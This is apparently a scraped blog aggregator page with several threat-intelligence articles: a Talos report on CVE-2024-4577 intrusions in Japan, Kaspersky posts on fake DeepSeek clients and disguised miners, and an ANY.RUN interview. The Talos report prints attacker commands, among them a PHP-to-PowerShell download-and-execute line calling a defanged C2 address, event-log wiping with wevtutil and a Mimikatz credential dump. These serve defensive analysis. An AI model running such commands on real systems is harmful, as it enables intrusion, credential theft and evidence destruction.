Welcome to this week’s edition of the Threat Source newsletter.
At Talos we bat on behalf of our customers, protecting them against all manner of cyber threats that may affect them. The nature of the threat actor and their origin or affiliation makes no difference; if they are attacking or planning to attack a customer, we do our utmost to stop them.
In practice, identifying the origin of attacks can be surprisingly difficult, much harder than identifying the attack itself. Attacks do not arrive wrapped in a flag with a certificate of origin. Typically, attackers seek to hide their origin so as to avoid the attention of law enforcement or the international community. However, although not an easy task, the attacker will often unwittingly leave clues to their identity.
We are all creatures of habit; we all have our preferred methods of doing things, tools that we are familiar with, or suppliers that we often choose over another. Threat actors are no different. Over time, the choices made by a threat actor in how they carry out their attacks, the methods they use, and their choice of victims builds to become a characteristic fingerprint.
New attacks can be analysed to identify if their characteristics overlap with those of a known threat actor. If so, we may surmise that the attack has been carried out by that threat actor. Nevertheless, uncovering and understanding the relationship between an attack and the threat actor behind the attack requires detailed research or possibly will only become apparent with the passage of time and the publication of additional information.
Even if an attack can be attributed to a known threat actor, the nature and origin of that threat actor may be obscure. Threat actors rarely admit to their actions and volunteer their identity. A detailed investigation by law enforcement or intelligence agencies may identify an attacker’s identity. Otherwise the security industry refers to known threat actors by various pseudonyms, few of which are definitively tied to one or more named individuals or an organistation. Understanding and communicating degrees of uncertainty when it comes to describing threat actors is a key skill in the threat intelligence community.
Suffice to say that we do not pick and choose the threats that we block. We block them regardless of their origin because this is who we are and what we do, and in any case, identifying the origin of a threat is not a simple matter.
The one big thing
Lotus Blossum is a sophisticated threat actor that we’ve uncovered conducting espionage campaigns against the government, manufacturing, telecoms, and media sectors in Vietnam, Hong Kong, Taiwan, and the Philippines. As part of this activity, the threat actor uses the Sagerunex family of backdoor malware for command and control activity.
Why do I care?
Understanding how threat actors such as Lotus Blossom conduct their operations helps inform organisations about the defenses that are required to protect against this and similar threats. Even if you are not working within one of the affected industrial sector, other threat actors may be conducting information stealing campaigns against you.
So now what?
Use the IOCs associated with the campaign to search for evidence of incursion within your own organization. Use this exercise as a means of verifying that you have visibility of the systems on your network and that you are able to search for known malicious IOCs.
Top security headlines of the week
244 million additional compromised passwords from a data dump offered for sale by criminals have been added to the privacy breach notification service “Have I Been Pwned”. (The Register)
A massive botnet consisting of more than 86 000 compromised IoT devices is conducting DDoS attacks against telecom firms and gaming platforms. (Cybersecurity Dive)
The US agency, CISA reports that it will continue to defend against threats including those from Russia. (TheRecord)
Can’t get enough Talos?
In The Talos Threat Perspective episode 9, Hazel Burton speaks with Nick Biasini about changes in social engineering techniques.
Upcoming events where you can find Talos
RSA (April 28-May 1, 2025) San Francisco, CA CTA TIPS 2025 (May 14-15, 2025) Arlington, VA Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA
Most prevalent malware files from Talos telemetry over the past week
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-06 19:06:512025-03-06 19:06:51Who is Responsible and Does it Matter?
Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan.
The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.
The attacker utilizes plugins of the publicly available Cobalt Strike kit “TaoWu” for-post exploitation activities.
Talos found a pre-configured installer script on the command and control (C2) server that deploys a full suite of adversarial tools and frameworks hosted on an Alibaba cloud container Registry, highlighting the potential misuse of such tools for malicious purposes by the attacker.
Talos noticed the attacker’s attempt at stealing the victim’s machine credentials. However, we assess with moderate confidence that the attacker’s motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks.
We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response (Talos IR) report for Q4 2024, and the discovery of this intrusion highlights this ongoing activity.
Victimology
We found that the attacker predominantly targets organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artefacts.
Attack overview
The attacker attempts to compromise the victim machine using an exploit program targeting the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows. In the event of successful exploitation, the attacker executes PowerShell script to run Cobalt Strike reverse HTTP shellcode, ensuring remote access to the victim machine.
Then, they begin reconnaissance by gathering system details and user privileges. They execute privilege escalation exploit programs, such as JuicyPotato, RottenPotato, and SweetPotato, to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”
To maintain stealth, they erase event logs using wevtutil commands, removing traces of their actions from the Windows security, system, and application logs. They further perform network reconnaissance using “fscan.exe” and “Seatbelt.exe” to map out potential lateral movement targets. The attacker has also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Eventually, they execute Mimikatz commands to dump and exfiltrate passwords and NTLM hashes from memory on the victim’s machine.
Initial access
Talos discovered that the attacker gains initial access to the victim’s network by exploiting the vulnerability CVE-2024-4577.
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It arises from the “Best-Fit” behavior in Windows code pages, where certain characters are replaced in command-line inputs. The flaw in the PHP-CGI module misinterprets these characters as PHP options, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI setup.
To target the vulnerability, the attacker leverages a publicly available exploit Python script “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks to see if a specific URL is vulnerable to the CVE-2024-4577 vulnerability. It does this by sending a specifically crafted POST request to a target URL with PHP code designed to trigger the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, it indicates a successful exploitation. Then, the exploit script prompts the user to input commands as PHP code that are executed on the vulnerable servers and gets the response displayed to the attacker.
Snippet of the CVE-2024-4577 exploit script.
In this intrusion, we found that the attacker has executed an embedded PowerShell command in the PHP code to trigger the infection.
<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>
The attacker triggers the infection by executing the PowerShell command through the PHP code, leading to the download and execution of a PowerShell injector script from the C2 server on the victim machine memory.
The PowerShell injector script is embedded with either base64-encoded or a hexadecimal data blob of the Cobalt Strike reverse http shellcode. Upon execution, it injects and executes the Cobalt Strike reverse HTTP shellcode on the victim machine’s memory and connects to the Cobalt Strike server running on the C2 server over HTTP, enabling remote access to the victim machine.
Sample PowerShell injector script.
The shellcode connects to the C2 server 38[.]14[.]255[.]23 through HTTP using the port 8077 and the URL paths “/6Qeq” or “/jANd”. The attacker has used one of the two HTTP header’s user agents.
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)
Snippet of the Cobalt Strike reverse HTTP shellcode.
Post-exploitation activities
After gaining remote access to the victim machine through Cobalt Strike reverse HTTP shellcode, the attacker remotely executes commands on the victim machine from the Cobalt Strike server that is configured with plugins from the “TaoWu” Cobalt Strike kit (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform the post-exploitation tasks.
Below are the post-exploitation commands that we observed in this attack that relate to the MITRE ATT&CK framework.
The attacker gathers the victim’s system and user information and also checks the time synchronization by remotely executing the following commands on the victim machine.
The attacker attempts to elevate the user privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits abuse the Windows method of handling authentication and impersonation tokens to escalate privileges from a low-privileged user to SYSTEM user.
Microsoft has already patched the flaws that these exploits target in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in the latest versions. However, if a Windows process has “SeImpersonatePrivilege” permission enabled that allows a process to impersonate another user’s security token, it could still be abused for privilege escalation using JuicyPotato, SweetPotato, and RottenPotato.
The attacker uses Ladon[.]exe, a plugin of the “TaoWu” Cobalt Strike kit, to bypass the user access controls in the victim machine.
The attacker leverages the “reg add” command and other .NET plugins of the TaoWu Cobalt Strike kit to modify the registry keys and create the Windows scheduled tasks to establish persistence on the victim machine.
The attacker executes the “reg add” command to add the path of the beacon executable to the Run registry key.
The attacker erases evidence of their activity on the victim machine by clearing the Windows event logs on the compromised endpoint using the living-off-the-land binary (LoLBin) “wevtutil.exe”.
wevtutil cl security
wevtutil cl system
wevtutil cl application
wevtutil cl windows powershell
The attacker uses fscan.exe, an open-source network scanning utility, and Seatbelt, a tool used to collect detailed information about a system—such as remote access configurations, network shares, and other security-relevant data on victim machine —to perform network reconnaissance and lateral movement in the victim network.
The attacker uploads the utility “fscan.exe” from the C2 server to the “C:WindowsTemp” directory on the victim machine.
upload /"C2 server path"/fscan.exe
The attacker runs the .NET program “Seatbelt.exe” to gather the remote access-related information of the victim machine.
Seatbelt.exe -group=Remote -full
The attacker runs “SharpGPOAbuse.exe”, a tool used to abuse group policy objects (GPOs) for malicious purposes. The attacker creates a scheduled task via GPO named “update” that runs a PowerShell command across the network, which downloads and executes the attacker’s PowerShell payload.
The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services in the sub-network.
fscan.exe -h 192[.]168[.]1[.]1/24
The attacker locates SSH services that accept a public key, automating SSH brute-forcing by providing the public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. They also attempt to brute-force SSH credentials for services running on a non-default port (2222).
Using the fscan utility, the attacker opens a reverse shell, enabling the attacker to execute commands on victim machines in the subnet while connecting back to their server on port 6666, and executes the “whoami” command on the accessible machines.
The attacker executes Mimikatz commands to gather plaintext passwords and NTLM hashes from memory on the victim’s machine.
sekurlsa::logonpasswords
Attacker’s tradecraft has similarities with a hacker group
We observed the attacker exploiting the weakness in the vulnerable systems to gain initial access and execute Cobalt Strike reverse HTTP beacons to have continued remote access to the victim machine. They have used the Cobalt Strike kit “TaoWu” that has several plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, and fscan, and Mimikatz for post-exploitation activities.
Similar techniques were previously observed being used by the hacker group called “Dark Cloud Shield” or “You Dun” in their attacks in 2024, as reported by the DFIR Report.
However, we are not attributing the attacks to the “You Dun” group, as we did not observe any further activities after harvesting the victim machine credentials in the current intrusion.
Potential abuse of adversarial tools and frameworks
We discovered that the attacker has used two C2 servers with IP addresses 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77 hosted on Alibaba cloud running the Cobalt Strike team server. During our research period, we noticed that the attacker has left the directory listings and access of the root folder to the internet in the C2 server 38[.]14[.]255[.]23, according to our OSINT research artefacts.
We found PowerShell scripts, Cobalt Strike beacon executables, and exploit programs along with the attacker’s command execution history logs in the C2 server’s exposed folder. Our further analysis of the contents of the exposed folder showed that the attacker had downloaded and executed a pre-configured installer shellscript called “LinuxEnvConfig.sh” from the repository “yijingsec” on Gitee platform (hxxps[://]gitee[.]com/yijingsec/), a Chinese Git-based platform like GitHub. The author had described that the repository belongs to a network security talent training service provider called “Yijing Network Security Academy,” which indicates that the attacker is likely abusing the legitimate resource for malicious intention.
The shell script “LinuxEnvConfig.sh” appeared to be designed to configure foundational environments for Ubuntu, Debian, and Kali Linux systems and facilitates the setup of various publicly available offensive security frameworks and tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus that are packaged and staged as docker containers in the docker container registry called “registry[.]cn-shanghai[.]aliyuncs[.]com”, an Alibaba cloud container Registry (ACR) located in the Shangai, China, region.
We also found that the shellscript, when executed by a user, modifies the machine’s DNS settings, pointing to a specific DNS server with the IP address 114[.]114[.]114[.]114, which is a Chinese 114DNS service and is not used very often in other regions.
Menu-driven interface of the LinuxEnvConfig.
We have continued to see various threat actors abusing publicly available tools, such as Cobalt Strike, Metasploit, ARL, Vulfocus, and PowerShell Empire for their malicious intentions. Still, we found that some of the tools and frameworks, such as Blue-Lotus, BeEF, and Viper C2, that the shell script “LinuxEnvConfig” deploys, were not seen very often being held in the possession of an attacker, and we have documented them further in the blog post to provide an overview of the capabilities and functionalities that an attacker could leverage by abusing such tools.
Blue-Lotus
Blue-Louts is a JavaScript webshell cross-site scripting attack framework. Blue-Lotus is docker-based and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology competition and research team from Tsinghua University.
Blue-Louts’ administrative panel is in Chinese with an XSS receiving dashboard that displays the connection details of the victim machine, including the IP address and browser.
Blue-Lotus tool control panel.
Blue-Lotus has the payload generation panel where the user can generate the JavaScript webshell payload using the default JavaScript template from the tool’s database. An attacker using the framework can generate the webshell and instrument them in their attacks to perform following tasks:
Cross-site scripting (XSS).
Screen capture of remote machine.
Get the reverse shell access to the remote machine.
Steal the browser cookies.
Creation of user ID and passwords in the Content Management System (CMS).
Blue-Lotus payload generation panel.
BeEF
BeEF is a publicly available browser exploitation framework that an attacker can hook to one or more web browsers in the victim machine and execute commands within the browser context. BeEF has command modules that consist of JavaScript codes to perform the following tasks:
Check if the links, forms, and URI paths of the web page in a hooked browser are vulnerable to XSS.
Submit arbitrary requests on behalf of the hooked browser.
Interact with the host on the local network of the hooked browser.
Send commands to the victim systems through Web Real-Time Communication (WebRTC) caller.
BeEF tool dashboard.
Viper C2
The Viper C2 is a modular framework with multiple plugins and scripts that define its extensive functionalities. The C2 has built-in integration with the (MSF) meterpreter console and scripts.
Viper C2 has functionalities, such as:
Antivirus software bypass.
Intranet tunnel.
File management of the remote machine, such as upload and execute other executable files.
Remote command execution on compromised host.
Generate payloads of Meterpreter reverse shell in multiple forms that work on Windows, Linux, and MacOS.
Display the network topology of the compromised network.
Viper C2 control panel.
Viper C2 has the capability of generating the payload of Meterpreter HTTP and TCP reverse shell for multiple platforms, including Windows, Linux, MacOS, Android, Java, and Python. The payloads can be generated in different formats, such as EXE, DLL, ELF, ELF-SO, MSBuild, Macho, PowerShell script, PowerShell command, Python script, and HTA and VBA scripts.
Viper C2 payload generation panel.
Generated payloads are delivered to victims using the Viper C2 web delivery commands that the user can generate, including the delivery URL and instrument in their attacks.
Viper C2 web delivery panel.
We compiled some of the command formats generated from Viper C2 that assists defenders and threat hunters for hunting threats related to Viper C2, shown below:
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for this threat:
Snort 2: 64632, 64633, 64630, 64631.
Snort 3: 301157, 301156.
Indicators of Compromise
IOCs for this threat can be found in our GitHub repository here.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-06 11:07:292025-03-06 11:07:29Unmasking the new persistent attacks on Japan
We’ve discovered several groups of sites mimicking the official chatbot website and distributing malicious code under the guise of what appears to be a legitimate client. To find out exactly how these cybervillains operate, and how to use AI safely, read on…
Malicious scripts and geofencing
Several malware distribution schemes were detected, all of which had the use of fake DeepSeek websites as the common denominator. The difference lies in what was distributed through these sites and how. This post thoroughly explores one of these schemes; for details on the others, see our full report on Securelist.
What would you think if you landed on a website with the domain deepseek-pc-ai[.]com or deepseek-ai-soft[.]com? You’d probably assume you could find there some DeepSeek-related software. And what kind of software might that be? A DeepSeek client, of course! And indeed, you’ll quickly see the bright Download and slightly duller Start Now buttons that greet visitors to the site.
Fake DeepSeek web page
Whichever of these buttons you click, an installer starts downloading. But there’s a catch: once initiated, instead of installing DeepSeek, the installer accesses malicious URLs, and manipulates scripts to activate the SSH service in Windows to configure it to work with the attackers’ keys. This enables them to remotely connect to the victim’s computer, who doesn’t even get a DeepSeek Windows client as consolation… which, by the way, doesn’t exist.
Interestingly, the fake sites use geofencing — restricting access based on the region of the IP address. For example, users from Russia on these domains saw a simple stub site with empty texts about DeepSeek — most likely generated by DeepSeek itself or a different large language model. Visitors from other countries, however, were taken to the malicious site distributing the fake client.
A million views on X
The main vector for distributing links to the malicious URLs was posts on the social network X (formerly Twitter). One of the most popular posts (now deleted) was published from the account of Australian startup Lumina Vista, which, open sources say, has no more than 10 employees. The company’s account itself is in its infancy: it only got the coveted blue check-mark in February 2025, and boasts just a dozen posts and fewer than 100 subscribers. Yet the post promoting the fake DeepSeek site garnered 1.2 million views and more than 100 reposts. Bit fishy? We investigated the accounts that reposted it and concluded that they could be bots, since all use the same naming convention and identifiers in the bio section. Incidentally, it’s quite possible that Lumina Vista’s account was simply hacked and used for paid promotion of the attackers’ ad post.
1.2 million views in a near-empty account? Smells like paid promotion
In the comments, some users pointed out that the link leads to a malicious site, but they were in the minority — the rest were simply expressing views about DeepSeek, Grok, and ChatGPT. However, none of the commenters noted the obvious: DeepSeek has no native client for Windows, and you can only access it in a browser. You can also run DeepSeek locally but that requires specialized software.
How to use AI safely
At present, it’s not easy to assess the scale of this and other malicious schemes involving fake DeepSeek pages. But one thing is for certain: these campaigns are massive and not targeted at specific users. Yet they’re developing very quickly: soon after the announcement of Grok-3, attackers began offering to download its client both from the domain v3-grok[.]com, and from… v3-deepseek[.]com! Indeed, Grok, DeepSeek – what’s the difference?…
Without reliable protection, any AI enthusiast is at risk. That’s why it’s vital to follow the safety rules and recommendations when using AI.
Filter sensitive data. Remember that what you write to a chatbot could be used against you: as with other cloud services, data can leak due to security flaws or account hacking.
Limit the use of third-party plugins. Every add-on app creates new threats. Special monitoring is required for execution plug-ins that can, for example, run malicious code to buy a plane ticket at your expense.
If you’re seriously interested in neural networks and want to learn how to use them safely, check out these posts:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-06 10:06:452025-03-06 10:06:45Attackers distributing Trojans disguised as DeepSeek or Grok clients for Windows | Kaspersky official blog
Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.
This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.
How cybercriminals exploit unsuspected users — and where bloggers fit into the picture — is what we’ll explore in this article.
Hackers disguised as honest developers
There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.
There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.
Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.
Where do bloggers fit in?
We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.
Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.
In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.
What about the miner?
The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.
For more about the malicious archive and how it persists in the system, check our post on Securelist.
How to protect yourself from miners
Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.
Here are some relevant articles you can read to learn more about miners and their dangers:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-05 13:07:312025-03-05 13:07:31Cybercriminals are distributing a miner disguised as a restriction-bypassing toolCybercriminals are distributing a miner disguised as a restriction-bypassing tool | Kaspersky official blog
How can security teams effectively monitor evolving attacks and stay ahead of constantly shifting attacker infrastructure? We spoke with a chief information security officer at a transport company about how they use subscriptions to Search Updates in Threat Intelligence Lookup to tackle this challenge.
Here’s what we learned.
Company Info
Without getting into any specifics, our company operates in the transportation sector, managing logistics across North America, Latin America, and Europe. Right now, the IT security team is at 30 professionals and as the CISO I’m responsible for overseeing strategic planning, risk management, and operations. Speaking of our use of ANY.RUN’s products, currently we have licenses for both the Interactive Sandbox and TI Lookup.
What is Threat Intelligence Lookup
TI Lookup from ANY.RUN provides a searchable database of over 40 types of indicators of compromise, attack, and behavior. The new data is extracted from thousands of public malware and phishing samples analyzed in ANY.RUN’s Interactive Sandbox every day.
Since all threats are executed in virtual machines, ANY.RUN takes a comprehensive snapshot of activities recorded during analysis, from network traffic file and paths to registry modifications and mutexes.
I’d say the entire transportation industry rests on email correspondence. Our company, despite being no match to giants like DHL, still has thousands of clients, contractors, and suppliers that we need to communicate with daily. Naturally, even a small email security slip-up, like exposing a few messages, could create major problems across the board. And attackers know this, too.
That’s why we pour a good chunk of the team’s resources into threat hunting and ensuring we have a grasp of the current threat landscape. We’re constantly monitoring for the recent attacks, phishing scams, malware campaigns, new CVEs, anything that may somehow be of concern to us. Of course, we can’t gobble up intel on every single threat out there, so we narrow it down to what’s relevant for our industry, and some of the core clients’ industries.
Where TI Lookup Fits in the Threat Hunting Strategy
Like any good security setup, we break ours down into areas. TI Lookup adds value pretty much evenly across all of them, from checking indicators as part of triage to discovering threat context in incident response.
Yet, if we’re talking about threat hunting, we subscribe to Search Updates in TI Lookup to keep up with the changes in ongoing cyber attacks and automate the collection of new indicators of compromise (IOCs) and threat samples. Let me explain how it works.
Search Updates in TI Lookup
TI Lookup users can subscribe to custom search queries to receive timely updates on relevant Indicators of Compromise (IOCs), Indicators of Attack (IOAs), and Indicators of Behavior (IOBs) belonging to the threats of their interest.
Gathering data on the threats that are relevant to us
Converting the data into actionable signatures and detection rules
There are several sources for such data, with publicly available research and reports published by other companies being the most common one. The problem here is that attackers constantly shift infrastructure – C2 servers might cycle IPs every 48 hours. So, relying on the indicators we find in public reports can do only so much. And that is precisely the detection gap that Search Updates in TI Lookup help to bridge.
TI Lookup lets users receive result updates on queries of their interest
Subscribing to Search Updates in TI Lookup allows us to use more stable indicators of behavior (IOBs)to track all the latest changes in specific attacks and see if they are still ongoing. IOBs are things like the tools used by attackers, the kill chain techniques, and infection traces on the system such as created directories, file names and types, etc. The things that do not tend to expire as fast as short-lived network infrastructure of attackers or hashes.
Query subscriptions are displayed in the left-side menu with the number of new results next to them
Essentially, with TI Lookup, we can put several IOBs related to a single attack together and use them in a search query to get notified about the latest samples and IOCs, which the threat hunting team can process and turn into detection rules.
The result is that we can follow active threats that may potentially target our company almost in real time because TI Lookup is updated every few hours with fresh data.
Collect intelligence on the latest cyber attacks with ANY.RUN’s TI Lookup
Our current collection of query subscriptions is well beyond a hundred entries. I will try to give you a few general types of threats that we tend to add to it and some of the examples.
At the moment we subscribe to well over a hundred search queries. To give you an idea of what we monitor, I’ll give you a couple of common threats we tend to follow.
Geo-Targeted Threats
While our HQ is in the United States, we have several local offices, which also become extensively targeted with cyber attacks. Search Updates make it easier for us to track several types of threats occurring in a specific country.
For example, we make sure to check for new samples of email-distributed infostealers in Colombia:
TI Lookup displays the latest public sandbox analyses featuring infostealers together with .msg and .eml files
For this query, we get several updates almost every week.
One of the samples returned by TI Lookup involved AsyncRAT sample
We check the new samples and see if they have anything of value and if so, use the indicators extracted by the sandbox to make signatures to scan the company’s infrastructure for any matching threats.
Common Vulnerabilities and Exposures (CVEs)
Another top concern on any threat hunters’ list is CVEs, both old and new. One of the recent examples is CVE-2025-21298, the vulnerability where simply previewing a malicious .rtf document in Outlook leads to remote code execution and system compromise.
As soon as we learned about it, we made sure to go to TI Lookup and sign up for a query that would provide us with relevant samples in case any attackers decided to abuse this vulnerability.
In the query, we combined the file type (rtf) with Outlook, used the attc-doc (document attachment) tag, and excluded pdfs:
The Events tab in TI Lookup provides a list of command line logs recorded across relevant sandbox sessions
As a result, we now can minimize the manual research on this threat and in case an actual attack with this CVE is uploaded to TI Lookup, we’ll be notified about it.
Another thing that I think is worth mentioning here is that this CVE is a great example of how flexible TI Lookup can be. Despite not having a specific tag for this threat, we were able to make up for that by using the big selection of search parameters.
Credential-Theft Attacks
Given phishing is by far the top threat our company faces, one of the most common types of it is fake credential-stealing forms.
There is a campaign that has been going for a while, where attackers send emails that contain links to fake Microsoft 365 pages. The catch is that the malicious domain names are designed to masquerade as legit Microsoft ones. One of the standout things here is the use of “0” and “o” before “365”. Needless to say, the Search Updates feature does a great job letting us know about the new domains and actual examples of these attacks.
TI Lookup lists all the matching domains found across relevant sandbox sessions
The team collects new domains and email samples and improves detection of any possible phishing attempts against our own infrastructure.
Enrich your threat knowledge with TI Lookup
Learn about TI Lookup and its capabilities to see how it can contribute to your company’s security
Explore more
Search Updates Hacks
The thing that’s not related to Query Subscriptions per se but is still of huge help is the wildcards. It really adds flexibility to the searches, so we potentially set up queries to be more specific and general, depending on the indicators we use for a threat.
Just last week, we subscribed to a query for a new campaign where attackers use website addresses that start with “google.com” but then have random strings of characters afterwards.
To get the newest variants of these domains, we added the “?” wildcard to the query – which stands for any single character. We used four question marks to account for the random part of the domain.
Each of the domains can be explored further in the sandbox sessions where they were logged
Search Updates let us know every time a matching fake domain is added to TI Lookup’s database.
Impact on Security
In terms of company’s security, TI Lookup provides us with some of the latest threat intelligence we can get. We can apply it immediately while indicators are still active to identify threats and protect the organization’s infrastructure in advance.
It also improves our awareness of the threat landscape, letting us track a wider array of attacks. We now have more data on a broader pool of threats than ever before and can identify the ones that are still ongoing and those that are no longer active.
Impact on Operations
If we’re talking about the team’s performance, the productivity definitely went up after we began using Query Subscriptions. Back in the day, we had to allocate a lot of time and staff to follow up on attacks that were relevant to us. This was a lot of manual work. I’m not saying that we no longer do it, but receiving Search Updates definitely made the process much easier.
We now get automated updates and can actually focus on more threats than before, because we no longer need to rely on guesswork in deciding which attacks will be more likely to affect us.
Now we simply create a query and hit subscribe. The more new results we see arriving for a particular threat in TI Lookup the higher priority it gets.
Team Feedback
Most of the team are well-familiar with the ANY.RUN sandbox, so adopting TI Lookup felt natural for them. It is with some of the new folks on the team we had to work a little harder to get them to a place where they could comfortably use the service. They mostly struggled with the query parameters and their meanings, as well as tags in the sandbox, which are the same in TI Lookup. But most of them managed to become fairly proficient in a week or two.
Conclusion
We want to thank the guest for taking the time to share their story and real-world examples of using TI Lookup. The behind-the-scenes view of a threat hunting team’s work is always a rare privilege and we really appreciate it. Our hope is that this article will help other users considering integrating the service in their organization with laying the groundwork for successful implementation.
As always, if you are open to letting others know how your team uses ANY.RUN’s products, we’ll be happy to hear from you at support@any.run.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-05 12:07:042025-03-05 12:07:04How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks
